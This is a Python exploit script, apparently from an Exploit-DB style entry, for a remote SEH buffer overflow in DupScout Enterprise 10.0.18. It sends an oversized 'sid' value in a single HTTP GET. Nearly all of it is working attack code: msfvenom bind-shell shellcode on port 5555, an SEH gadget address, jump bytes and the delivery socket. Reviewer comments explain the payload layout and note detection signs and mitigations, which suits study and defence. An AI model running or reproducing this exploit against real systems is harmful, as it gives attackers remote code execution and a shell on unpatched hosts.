#!/usr/bin/env python3
# Exploit Title: DupScout Enterprise 10.0.18 'sid' Remote Buffer Overflow (SEH)
# Date: 2020-12-08
# Discovered by: Fluid Attacks
# Exploit Author: Andres Roldan at Fluid Attacks
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Version: 10.0.18
# Tested on: Windows 10 Pro x64

import socket
import struct

# Where the single HTTP request below is sent: presumably the product's web
# interface, reached over plain HTTP on TCP/80 of the loopback address.
HOST, PORT = "127.0.0.1", 80

# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp
# LPORT=5555 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -f python -v SHELL
#
# SHELL is an opaque, encoder-generated byte blob reproduced from the
# msfvenom invocation above; its contents cannot be verified from this file.
# Per that command line it is an x86 bind-shell stage listening on TCP/5555,
# which is the port the final print statement tells the operator to check.
# The excluded bytes (NUL, TAB, LF, CR, SPACE) are presumably the characters
# that would terminate or corrupt the value inside an HTTP request line.
# NOTE(review): from a detection standpoint, a listener appearing on an
# unexpected port after a single oversized GET is the observable artefact.
SHELL = b""
SHELL += b"\xd9\xc1\xd9\x74\x24\xf4\x5a\x2b\xc9\xbd\xb2\x01"
SHELL += b"\x0f\xaa\xb1\x53\x31\x6a\x17\x83\xc2\x04\x03\xd8"
SHELL += b"\x12\xed\x5f\xe0\xfd\x73\x9f\x18\xfe\x13\x29\xfd"
SHELL += b"\xcf\x13\x4d\x76\x7f\xa4\x05\xda\x8c\x4f\x4b\xce"
SHELL += b"\x07\x3d\x44\xe1\xa0\x88\xb2\xcc\x31\xa0\x87\x4f"
SHELL += b"\xb2\xbb\xdb\xaf\x8b\x73\x2e\xae\xcc\x6e\xc3\xe2"
SHELL += b"\x85\xe5\x76\x12\xa1\xb0\x4a\x99\xf9\x55\xcb\x7e"
SHELL += b"\x49\x57\xfa\xd1\xc1\x0e\xdc\xd0\x06\x3b\x55\xca"
SHELL += b"\x4b\x06\x2f\x61\xbf\xfc\xae\xa3\xf1\xfd\x1d\x8a"
SHELL += b"\x3d\x0c\x5f\xcb\xfa\xef\x2a\x25\xf9\x92\x2c\xf2"
SHELL += b"\x83\x48\xb8\xe0\x24\x1a\x1a\xcc\xd5\xcf\xfd\x87"
SHELL += b"\xda\xa4\x8a\xcf\xfe\x3b\x5e\x64\xfa\xb0\x61\xaa"
SHELL += b"\x8a\x83\x45\x6e\xd6\x50\xe7\x37\xb2\x37\x18\x27"
SHELL += b"\x1d\xe7\xbc\x2c\xb0\xfc\xcc\x6f\xdd\x31\xfd\x8f"
SHELL += b"\x1d\x5e\x76\xfc\x2f\xc1\x2c\x6a\x1c\x8a\xea\x6d"
SHELL += b"\x63\xa1\x4b\xe1\x9a\x4a\xac\x28\x59\x1e\xfc\x42"
SHELL += b"\x48\x1f\x97\x92\x75\xca\x02\x9a\xd0\xa5\x30\x67"
SHELL += b"\xa2\x15\xf5\xc7\x4b\x7c\xfa\x38\x6b\x7f\xd0\x51"
SHELL += b"\x04\x82\xdb\x48\x66\x0b\x3d\x18\x98\x5a\x95\xb4"
SHELL += b"\x5a\xb9\x2e\x23\xa4\xeb\x06\xc3\xed\xfd\x91\xec"
SHELL += b"\xed\x2b\xb6\x7a\x66\x38\x02\x9b\x79\x15\x22\xcc"
SHELL += b"\xee\xe3\xa3\xbf\x8f\xf4\xe9\x57\x33\x66\x76\xa7"
SHELL += b"\x3a\x9b\x21\xf0\x6b\x6d\x38\x94\x81\xd4\x92\x8a"
SHELL += b"\x5b\x80\xdd\x0e\x80\x71\xe3\x8f\x45\xcd\xc7\x9f"
SHELL += b"\x93\xce\x43\xcb\x4b\x99\x1d\xa5\x2d\x73\xec\x1f"
SHELL += b"\xe4\x28\xa6\xf7\x71\x03\x79\x81\x7d\x4e\x0f\x6d"
SHELL += b"\xcf\x27\x56\x92\xe0\xaf\x5e\xeb\x1c\x50\xa0\x26"
SHELL += b"\xa5\x70\x43\xe2\xd0\x18\xda\x67\x59\x45\xdd\x52"
SHELL += b"\x9e\x70\x5e\x56\x5f\x87\x7e\x13\x5a\xc3\x38\xc8"
SHELL += b"\x16\x5c\xad\xee\x85\x5d\xe4"

# Overflow body that becomes the raw value of the ``sid`` query parameter.
# Layout by byte offset within the value (derived from the arithmetic below):
#   [0, 2482)       NOP padding sized so that SHELL ends exactly at offset 2482
#   [2482, 2486)    short jmp +0x10 followed by two NOPs — presumably the nSEH
#                   slot of the overwritten exception record (the header calls
#                   this an SEH overflow; the exact record offset is not shown here)
#   [2486, 2490)    handler slot: little-endian address of the gadget noted below
#   [2490, 2522)    32 NOPs
#   [2522, 2527)    x86 near jmp with rel32 0xfffff64d, a negative displacement,
#                   so execution is sent backwards toward the padding/SHELL
#   [2527, ...)     "C" filler
# The hard-coded handler address only works because, per the comment below,
# libspp.dll is loaded without ASLR/rebasing and without SafeSEH; building or
# loading that module with those mitigations enabled is what defeats this
# technique, independent of the input-length check that is actually missing.
# NOTE(review): the filler term subtracts only the 4-byte handler slot and the
# 32 NOPs, not the 4-byte nSEH bytes or the 5-byte jmp, so the whole value is
# 10009 bytes rather than 10000. Harmless for filler, but keep it in mind when
# matching request sizes in access or WAF logs.
PAYLOAD = (
    b"\x90" * (2482 - len(SHELL))
    + SHELL
    + b"\xeb\x10\x90\x90"
    +
    # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
    struct.pack("<L", 0x1002071C)
    + b"\x90" * 32
    + b"\xE9\x4D\xF6\xFF\xFF"
    + b"C" * (10000 - 2482 - 4 - 32)
)

# Minimal HTTP/1.1 request: the whole of PAYLOAD is spliced into the request
# line as the unencoded ``sid`` value, and Host is the only header sent.
# From a monitoring standpoint this is conspicuous — a multi-kilobyte request
# line consisting largely of non-printable bytes — so a request-line length
# limit or a non-ASCII-in-URL rule at the web tier would surface it.
HTTP_PAYLOAD = b"".join(
    (
        b"GET /settings&sid=",
        PAYLOAD,
        b" HTTP/1.1\r\n",
        b"Host: ",
        HOST.encode(),
        b"\r\n\r\n",
    )
)

# Single-shot delivery: one TCP connection, one write of the full request,
# then the socket is closed on leaving the ``with`` block. Nothing is read
# back, so the script cannot tell whether the request was even accepted; the
# only success signal it offers is the operator checking the port named in
# the msfvenom comment above.
with socket.create_connection((HOST, PORT)) as conn:
    print("[+] Sending payload...")
    conn.sendall(HTTP_PAYLOAD)
    print("[+] Done. Check for a shell on port 5555.")
